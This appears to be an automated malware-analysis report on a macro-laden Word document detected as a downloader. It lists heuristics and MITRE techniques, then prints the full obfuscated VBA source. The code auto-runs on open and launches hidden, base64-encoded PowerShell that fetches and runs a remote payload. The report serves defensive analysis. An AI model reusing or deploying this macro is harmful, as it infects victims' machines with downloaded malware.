Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell command, which in turn invokes PowerShell. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Valyria-9978334-0'. The presence of the Shell() call and the auto-execution marker strongly suggests downloader or dropper functionality.
Heuristics (7)

- ClamAV: Doc.Downloader.Valyria-9978334-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-9978334-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `End Select IfptzcXZCu = GXSpG + Shell(ihljNrm + Chr(vbKeyP) + zscViizWItK + WmZHcMNlaF + zVHjAk + rwdjDVQVQNz + zjanqdW + AHqVvwR, YPIiTiWrsK + vbHide + flAucG) Select Case KAlmABKT`
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `End Function Sub Autoopen() On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14837 bytes | 43e435c9568071d3aa5d04cdffba4b2b1e7da0f963772d2cf4d3c44e8efbe332 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hNjPsAJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IfptzcXZCu()
On Error Resume Next
Select Case KAljiZWU
Case 67457
qSGTjK = 14788
WhKjAD = CDbl(12933)
Case 25589
UrmqJG = PwYLQ
MzopJc = 26272
End Select
Select Case KAldOwjd
Case 26187
YWAZQ = 60971
dwmhL = CDbl(96121)
Case 8155
mwJpUM = Ktiztr
oHfszq = 49980
End Select
IfptzcXZCu = GXSpG + Shell(ihljNrm + Chr(vbKeyP) + zscViizWItK + WmZHcMNlaF + zVHjAk + rwdjDVQVQNz + zjanqdW + AHqVvwR, YPIiTiWrsK + vbHide + flAucG)
Select Case KAlmABKT
Case 83535
cQPvq = 54154
Zoswf = CDbl(23940)
Case 12491
RmLAIf = SwNMN
JnKtB = 13147
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlNjzAA
Case 73206
qACLNR = 82253
PzTiYa = CDbl(95991)
Case 32295
iOsQBi = iFoih
KzWwLS = 92601
End Select
IfptzcXZCu
Select Case KAlwwTaY
Case 19883
SirPT = 28400
mtQpR = CDbl(98807)
Case 62559
cIBap = MaPfU
fRYpcY = 56875
End Select
End Sub
Attribute VB_Name = "XzSOaoMc"
Function zscViizWItK()
On Error Resume Next
Select Case KAlDzRktS
Case 17115
fbKjj = 59492
PwokJj = CDbl(60291)
Case 25506
WNjoiG = IISUlj
pjnYLr = 48882
End Select
vQYRdAnpZ = "owersHeLL -" + "WinDowsTyle h" + "idden -e KAA" + "nAEYATAA2A" + "G4AcwBhACcAKw" + "AnAGQAJwAr" + "ACcAY" + "QAnACsAJw" + "BzAGQAIAA" + "nACsAJwA9A"
Select Case KAlhUwKw
Case 33408
osYlY = 27023
jUjYcC = CDbl(51925)
Case 32887
DjKzD = KTVTG
PpUHhw = 39456
End Select
YEowNdiLZ = "CAAJwArA" + "CcAJg" + "AnACsAJwAo" + "AG4AJwArAC" + "cAVQBlAG4AbgBVA" + "GUAKwB" + "uAFUAZQBlAG4A"
Select Case KAlwALZJ
Case 94624
pmPXp = 31238
vioSI = CDbl(34915)
Case 65326
PEIzU = OQuFGr
DUkpG = 5864
End Select
cjEkHR = "VQBlACsAbgA" + "nACsAJwBVAGU" + "AdwAtA" + "G8AYgAnACsAJw" + "BqAGU" + "AYwBuAFUAZQAr" + "AG4AVQBlAHQ" + "AbgBVA" + "GUAKQAgAHIAJw" + "ArACcAYQBu"
Select Case KAlhGwQP
Case 9957
qTPoCr = 85685
HRJcoa = CDbl(42645)
Case 39465
jYwrJ = cBPMX
HrkPj = 46897
End Select
kvWRwAwMDD = "AGQAbwBt" + "ADsARgBMADYAW" + "QBZAFUAI" + "AA9ACA" + "ALgAoAG4AVQBl" + "AG4AZ" + "QBuACcAK" + "wAnAFUAJwA"
Select Case KAlfREAUT
Case 25443
fdOuK = 73776
hrIChP = CDbl(74328)
Case 74111
iVazaZ = FCYpz
XbYwkw = 45714
End Select
aRUwzVNdKwq = "rACcAZ" + "QAnACsAJwArAG4" + "AVQAnACs" + "AJwBlACc" + "AKwAnAHcAbgBVAG" + "UAKwBuAFUAZQA" + "nACsAJwAt" + "ACcAKwA" + "nAG8AYgBqAGUA" + "YwB0AG4AVQBlAC"
Select Case KAlSMWcK
Case 86277
hrhsf = 32444
zsNsG = CDbl(30563)
Case 17543
lzfCTh = kfpOmM
EWQjH = 45919
End Select
wChHopqnJRi = "kAIABTACcAKwAnA" + "HkAcwB0AGU" + "AbQAuAE4AZQ" + "B0AC4AV" + "wBlAGIAQ"
Select Case KAlrwUOB
Case 53977
irqHrZ = 50314
zHZZC = CDbl(12785)
Case 3545
QiJqo = cZIlhu
LoRFw = 4365
End Select
zVtdLiJmPK = "wBsAGkAZQ" + "AnACsAJw" + "BuAHQA" + "OwBGACcAKw" + "AnAEwANgA"
Select Case KAlzGumji
Case 48206
HiUEp = 88554
jsmrr = CDbl(28451)
Case 31380
GsfZmT = TEEND
kWGJS = 39033
End Select
NawjEJHAK = "nACsAJwBOA" + "FMAQg" + "AgACc" + "AKwAnAD0" + "AIABGAEwAJwArAC" + "cANgA"
Select Case KAlZQdEG
Case 14184
ZTGLZ = 67827
nuDFm = CDbl(79285)
Case 99313
Qzbqu = VfiZuz
qPbTf = 27657
End Select
KHnIDS = "nACsAJwBuAHM" + "AYQBkAGEAcw" + "BkAC4" + "AJwArACc" + "AbgBlAHgAdA" + "AnACs"
Select Case KAlAztoTC
Case 92579
DEffTL = 99528
cPNFDo = CDbl(47390)
Case 73002
lhzicm = aROSG
XrDtbd = 87641
End Select
ioEMAKkK = "AJwAoAD" + "EAMAAwADAAMAAnA" + "CsAJwAsACAAMg" + "A4ADIAMQ" + "AzADMAKQA7" + "AEYATAA" + "2AEEARABDAFgA" + "IAA9ACAAb"
zscViizWItK = vQYRdAnpZ + YEowNdiLZ + cjEkHR + kvWRwAwMDD + aRUwzVNdKwq + wChHopqnJRi + zVtdLiJmPK + NawjEJHAK + KHnIDS + ioEMAKkK
End Function
Function WmZHcMNlaF()
On Error Resume Next
Select Case KAliOqmw
Case 7276
IiMZH = 19467
UwzbSX = CDbl(8120)
Case 3271
hWpsVC = MusPH
Hsiip = 34369
End Select
wVBXVdMsmWG = "gBVACcAKw" + "AnAGUADQAKACc" + "AKwAn" + "AGgAJwArACcAd" + "AB0AHA" + "AJwArACc" + "AOgAnACsAJwAvAC" + "8AaQAn" + "ACsAJwBuAH"
Select Case KAlBtzcoX
Case 9193
ALVLcR = 18310
ILwGU = CDbl(261)
Case 58003
uaArF = jhmOvn
MDwzO = 22642
End Select
TDwWpXzIiC = "QAcgBpAGcAdQAn" + "ACsAJwBlAHcAZQ" + "BiAC4AYwBvA" + "G0ALwBpAFE" + "AVgA2AEEALwAnA" + "CsAJw" + "BAAGgA" + "dAB0AHAAOgAnA"
Select Case KAlWEiCzc
Case 41700
tKSBP = 69580
NWNqDb = CDbl(76584)
Case 47810
VWsvI = JFousq
wucbNo = 52661
End Select
RsdWppoGqzn = "CsAJwAvAC8AJwAr" + "ACcAcABy" + "ACcAKwAnAG8AdgA" + "nACsA" + "JwBhACcAKwAnA" + "G4AZQA" + "nACsAJwB0" + "ACcAKwA"
Select Case KAluYnipb
Case 69318
IIifQ = 64090
kaOvBN = CDbl(24984)
Case 40143
rRYTNc = zzRaz
QSWZh = 62084
End Select
iACBtaVS = "nAC4AYwBvAC4Aag" + "BwAC8Ad" + "QA2AEMAZAAnA" + "CsAJwBCAC" + "8AQAA"
Select Case KAlJLjRSs
Case 2292
sajhDv = 76240
DQKfu = CDbl(67679)
Case 64751
GdiJvZ = fjiifl
AVbPH = 45117
End Select
wRAqmztviuA = "nACsAJwBoAHQAdA" + "BwACcA" + "KwAnADoAJ" + "wArACc" + "ALwAvAG0AYQByAH" + "UAZwAnACsAJw" + "BpAG4"
Select Case KAltuJduS
Case 16836
Asaih = 20185
NrCTwD = CDbl(1451)
Case 39654
ImwQp = icKQN
UjAGTJ = 61654
End Select
tzlcELH = "ALgBuAG" + "UAdAAv" + "AEsAZQB4AGEA" + "UQAvAE" + "AAaAB0ACcAK"
WmZHcMNlaF = wVBXVdMsmWG + TDwWpXzIiC + RsdWppoGqzn + iACBtaVS + wRAqmztviuA + tzlcELH
End Function
Function zVHjAk()
On Error Resume Next
Select Case KAlIBEwLH
Case 67878
nZisa = 94169
HVshw = CDbl(26366)
Case 96650
QzGsL = MftUi
GiAEh = 40552
End Select
WXtXoQE = "wAnAHQ" + "AJwArAC" + "cAcAA6AC8A" + "LwB0AHUAbABwAGM" + "AJwArACcAbw" + "BuAHMAdQ" + "BsAHQALgBuACcAK"
Select Case KAloklUI
Case 45973
skabj = 55227
hnzFP = CDbl(44966)
Case 20641
ulXvrO = VoAbv
iiczU = 1564
End Select
zfdrBlz = "wAnAGwALwBFA" + "E0AdwAnACs" + "AJwBpAFMAL" + "wBAAGgAdAB0ACc" + "AKwAnAHAAOgAvA" + "CcAKwAnAC" + "8AJwArACcAd" + "AB1AGQAbwAn" + "ACsAJwBpAG4" + "AJwArACcAdA"
Select Case KAlbESkB
Case 90864
vAwRz = 13578
qAwMf = CDbl(94424)
Case 37775
mbIjz = JWIuWB
pSmuwo = 58238
End Select
RurmTiiGzI = "BlAHIAb" + "gBlAH" + "QALgAnA" + "CsAJwBjAG8Ab" + "QAuAGIAcg" + "AvADYAWQBYAGUAU" + "wBiAC8AJwArA"
Select Case KAlpidoz
Case 84669
fkoDpM = 35869
cUvali = CDbl(81253)
Case 45133
FMBhJS = Ipuwsf
CGfrYF = 36276
End Select
imdXWJUYFRp = "CcAbgBV" + "AGUALgBTA" + "HAAbABpAHQAKAB" + "uAFUAZQA" + "nACsA" + "JwBAAG4AVQB" + "lACkAOwBGAEwA" + "NgBTAEQAQwAg" + "AD0AJwArACcAIA" + "BGAEwANgB"
Select Case KAlmWbKZ
Case 2053
sqzLC = 68272
qwVRFv = CDbl(72)
Case 35898
wzctU = nSRIt
iGzsiv = 94351
End Select
QiPkXpKEbf = "lAG4AdgAnACs" + "AJwA6ACcAKwAnAH" + "AAdQBiAGwAaQBjA" + "CcAKwAn" + "ACAAKwAgA"
Select Case KAlzhcIR
Case 30838
VGzXMU = 1011
NwHtlD = CDbl(63957)
Case 87090
qKLqWY = ACPZR
UcEYR = 22474
End Select
izAlWo = "G4AVQAnACsAJwBl" + "ACcAKwAnAEwAN" + "gBWAG4AVQBlAC" + "AAKwAnACsA"
Select Case KAlkjFic
Case 72538
aBLzPo = 66777
GEswh = CDbl(54718)
Case 45423
FbLtc = oNlVbJ
EhNkc = 93863
End Select
YNdSP = "JwAgAEYAJw" + "ArACcAT" + "AA2ACcAKwA" + "nAE4AUwBCACA" + "AJwArACc" + "AKwAn" + "ACsAJwAgA" + "CgAbgBVAGUAJ"
Select Case KAlrPJdlC
Case 40894
fSipMX = 1371
QsTvN = CDbl(97170)
Case 27067
MZICXf = EfZSp
iHaKo = 65102
End Select
CaAnRbjX = "wArACcALgBlAHgA" + "JwArACcAbgB" + "VACcAKwAnAGUAK" + "wBuAFUAZQBlAG4" + "AVQAnACsAJwB" + "lACkAOwB"
Select Case KAlrlwmE
Case 58490
sJBlsB = 28573
MtTcz = CDbl(9287)
Case 49159
nFKki = slYQvC
cWzsjV = 90014
End Select
aKzQRAmaE = "mAG8AcgBlAGEA" + "JwArACcAYwBoA" + "CgARgBM" + "ADYAYQBzA" + "GYAYwAgAGkA" + "bgAnACsAJwA" + "gAEYATAA2AEEARA"
Select Case KAloZoDSv
Case 62230
LiORbJ = 62967
tOHQQM = CDbl(53908)
Case 11698
pjXVk = jifzj
hPpMu = 23911
End Select
isLGBGEZ = "BDACcAKwAnAF" + "gAJwAr" + "ACcAK" + "QB7AHQAcgAnACsA" + "JwB5ACcAKwAnAHs" + "ARgBMADYAWQB" + "ZAFUAJwArACc" + "ALgAnACs"
zVHjAk = WXtXoQE + zfdrBlz + RurmTiiGzI + imdXWJUYFRp + QiPkXpKEbf + izAlWo + YNdSP + CaAnRbjX + aKzQRAmaE + isLGBGEZ
End Function
Function rwdjDVQVQNz()
On Error Resume Next
Select Case KAljkwTpE
Case 97776
OdNbz = 66467
cLIVbR = CDbl(59891)
Case 75246
JAWMwR = VAtZb
QiQlvU = 1597
End Select
awMRdqIwkCR = "AJwA2AGcAJwAr" + "ACcAVw" + "BEAG8AZAAn" + "ACsAJwA3ACcAKwA" + "nAEgAVwBuAGwAZ" + "AA3AEgATw" + "BhAGQAJwAr" + "ACcARgAnACsA" + "JwBJAGQANwBI" + "AGwAZQA2AG"
Select Case KAlXinpm
Case 59182
YkRBz = 5055
ohlWz = CDbl(49175)
Case 84884
DJQmua = qVKmi
RjXLmA = 94336
End Select
iRUurjM = "cAVwAoA" + "EYATAA2ACcA" + "KwAnAGEAcwAnAC" + "sAJwBmACcAKwAn" + "AGMALg" + "A2ACcAKwAnAGcAJ" + "wArACcAVwA" + "nACsAJwBUAG8AJw" + "ArACcAUwB0AH" + "IAZAA3"
Select Case KAlcXdoG
Case 87767
zZWbZw = 59265
ZAjdTt = CDbl(91296)
Case 82753
YXWwO = LZvLb
nwojWr = 93130
End Select
iWEoTU = "ACcAKwAnA" + "EgAJwAr" + "ACcAaQBkAD" + "cAJwAr" + "ACcASA" + "BOAGcANgBnA"
Select Case KAlLEpnFw
Case 20780
WdVjj = 33895
iWkkO = CDbl(22923)
Case 3976
lDslCv = zCzDAT
jtQzIC = 34011
End Select
SfFumwC = "FcAKAApACcAKwA" + "nACwA" + "IABGAEwANg" + "BTAEQAQwApAD"
Select Case KAlvFViFJ
Case 73392
hbIaE = 69315
MIGZj = CDbl(36963)
Case 64726
RwAnqU = DzMvI
QUqnLv = 33053
End Select
dlbKAiwcZIp = "sAJwArACc" + "AJgAoAG4A" + "VQBlAEkAbgB2A" + "G8AbgBVAG" + "UAJwArA" + "CcAKwBuAF" + "UAZQBrAG4" + "AVQBlACsAbgBVAG"
Select Case KAlrsdzjD
Case 84396
dlWNc = 8759
EWvmTY = CDbl(18401)
Case 26273
cawnQ = VXQBZE
nKQWB = 42261
End Select
zmGlTd = "UAJwArACcAZQA" + "tAEkAdAAnACsAJ" + "wBlAG0AJ" + "wArACc" + "AbgBVAGUAJ" + "wArACcAKQAoAEY" + "ATAA2AFMA" + "RABDACkAJwArACc"
rwdjDVQVQNz = awMRdqIwkCR + iRUurjM + iWEoTU + SfFumwC + dlbKAiwcZIp + zmGlTd
End Function
Function zjanqdW()
On Error Resume Next
Select Case KAlYuJLjl
Case 32684
JzChi = 40443
GHElr = CDbl(31774)
Case 98166
aijijl = wWnmj
QkDfUF = 27251
End Select
KbHcDMEGWrd = "AOwBi" + "ACcAKwAnAHIAZQ" + "BhACc" + "AKwAn" + "AGsAOwB9AG" + "MAYQB" + "0ACcAKwAnAGMAJw" + "ArACcAaAB7" + "AH0AfQAnACkALg" + "BSAEUAUABsA"
Select Case KAlzrZBP
Case 7691
SQiKZ = 95557
jCDhim = CDbl(2783)
Case 61580
slqpWA = XLkib
HjThNi = 11555
End Select
ZtwzpQPYd = "EEAQwBlACgA" + "KABbAGMA" + "SABBAFIAXQA3A" + "DAAKwBbA" + "GMASABBAFIA" + "XQA3ADYAK" + "wBbAGMA"
Select Case KAlbKjiE
Case 2869
mabRTz = 63014
ZOlRK = CDbl(13242)
Case 99190
THtuWO = ZXakQb
HSwik = 69564
End Select
WKFZv = "SABBAFIAXQA1ADQ" + "AKQAsA" + "FsAUwBUAFIASQ" + "BuAGcAXQBbAGMA" + "SABBAFIAXQ" + "AzADYAKQAuA" + "FIARQBQAGwAQ" + "QBDAGUAKAAo"
Select Case KAlNIqaQ
Case 88471
cMvCc = 40302
aKGFY = CDbl(57612)
Case 4371
tMPpSH = SjWPf
wDUGU = 58569
End Select
XiEVjuhNGX = "AFsAYwBIAEE" + "AUgBdA" + "DEAMAAwACsAWwB" + "jAEgAQQBSAF0AN" + "QA1ACsAW" + "wBjAEgAQQBSA" + "F0ANwAyACkA"
Select Case KAlKiioGq
Case 61964
sYLGH = 37400
dKabL = CDbl(18023)
Case 87844
jMpKc = mwEzF
Oibjcb = 21001
End Select
DQkZiHYklzd = "LAAnAGAAJwApA" + "C4AUgB" + "FAFAAbABBA" + "EMAZQAoACgAWwBj" + "AEgAQ" + "QBSAF0AMQ"
Select Case KAlHKJYmi
Case 48855
ftTnR = 31523
cQfDA = CDbl(11221)
Case 50553
GBkBz = rwjwTG
DRXti = 56760
End Select
uAwwBHoNuo = "AxADAAK" + "wBbAGMAS" + "ABBAFIAXQA" + "4ADUAKw" + "BbAGMASABB" + "AFIAXQAxADA" + "AMQApACwAWwBT"
Select Case KAlLjRSz
Case 53421
SzXKUh = 6214
WChZZ = CDbl(78156)
Case 90666
pzJjYz = JRcHw
jSDXlY = 1469
End Select
jCSGIuEStVA = "AFQAU" + "gBJAG4" + "AZwBdAFsAY" + "wBIAEEA" + "UgBdADMAOQApAC" + "4AUgBFAFAAbABB" + "AEMAZQAoAC"
Select Case KAlnwYSA
Case 90360
MIEdP = 93154
UnuaTp = CDbl(26694)
Case 86161
ZGbmjd = nPuXB
kOXElz = 17797
End Select
FmhbwjEmMJa = "gAWwBjAEgAQQB" + "SAF0ANQA0AC" + "sAWwBj" + "AEgAQQBSAF0" + "AMQAwAD"
zjanqdW = KbHcDMEGWrd + ZtwzpQPYd + WKFZv + XiEVjuhNGX + DQkZiHYklzd + uAwwBHoNuo + jCSGIuEStVA + FmhbwjEmMJa
End Function
Function AHqVvwR()
On Error Resume Next
Select Case KAldjiGz
Case 29856
LFLwuG = 98026
ZIliG = CDbl(31817)
Case 26920
YbVDj = ODQjU
azflOY = 55484
End Select
rUfzXAf = "MAKwBbAG" + "MASABBAFIA" + "XQA4ADcAKQAsAFs" + "AUwBUAFIASQBuA" + "GcAXQB" + "bAGMASABBAFI" + "AXQAzADQAK" + "QAuAFIARQBQAGw" + "AQQBD"
Select Case KAljZGsl
Case 6411
vAOCHP = 20723
fcMwI = CDbl(81595)
Case 14092
LmCkbd = UinDmz
cRdDT = 7035
End Select
MiaNNijqz = "AGUAKAAoAFs" + "AYwBIAEEAUgB" + "dADcANgArAFsA" + "YwBIAEEAUgB" + "dADUANAAr" + "AFsAYwBIAEEAU" + "gBdADgANgApAC" + "wAJwBcACcAKQA" + "gAHwAIAB" + "pAGUAeAA="
AHqVvwR = rUfzXAf + MiaNNijqz
End Function